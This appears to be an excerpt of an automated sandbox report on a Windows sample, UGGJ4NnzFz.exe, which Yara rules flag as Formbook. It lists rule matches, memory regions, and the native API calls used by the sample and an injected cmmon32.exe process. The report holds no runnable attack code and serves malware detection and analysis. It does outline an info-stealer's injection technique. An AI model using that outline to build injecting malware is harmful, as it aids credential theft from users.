          Source: Yara matchFile source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_004181BC NtCreateFile,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_004182EB NtClose,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041839B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009DB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009DA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009DAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9560 NtWriteFile,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009DA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045BAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045BA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045BA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045BB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045BA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003B81C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003B8270 NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003B82F0 NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003B83A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003B81BC NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003B82EB NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003B839B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00404853
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00406131
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_73751A98
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041D042
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041CB69
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00408C5B
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00408C60
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00402D87
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041CF4E
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AB090
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A620A8
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A628EC
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A6E824
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A51002
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA830
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099F900
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B4120
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A622AE
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A4FA2B
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CEBB0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5DBD2
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A503DA
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A62B28
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BAB40
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A841F
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5D466
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C2581
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AD5E0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A625DD
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A62D07
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00990D20
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A61D55
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A62EF7
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B6E30
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5D616
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A61FF1
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A6DFCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463D466
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04641D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04642D07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04570D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_046425DD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A2581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04596E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463D616
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04642EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04641FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0464DFCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0464E824
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459A830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_046428EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458B090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_046420A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457F900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04594120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045999BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0462FA2B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_046422AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459AB40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04642B28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463DBD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_046303DA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AEBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BD042
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BCB69
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003A8C60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003A8C5B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003A2D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003A2D87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BCF4E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003A2FB0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: String function: 0099B150 appears 72 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 0457B150 appears 72 times
          Source: UGGJ4NnzFz.exe, 00000000.00000003.217329027.00000000099D6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UGGJ4NnzFz.exe
          Source: UGGJ4NnzFz.exe, 00000001.00000002.274341058.0000000000939000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs UGGJ4NnzFz.exe
          Source: UGGJ4NnzFz.exe, 00000001.00000002.274699413.0000000000C1F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UGGJ4NnzFz.exe
          Source: UGGJ4NnzFz.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
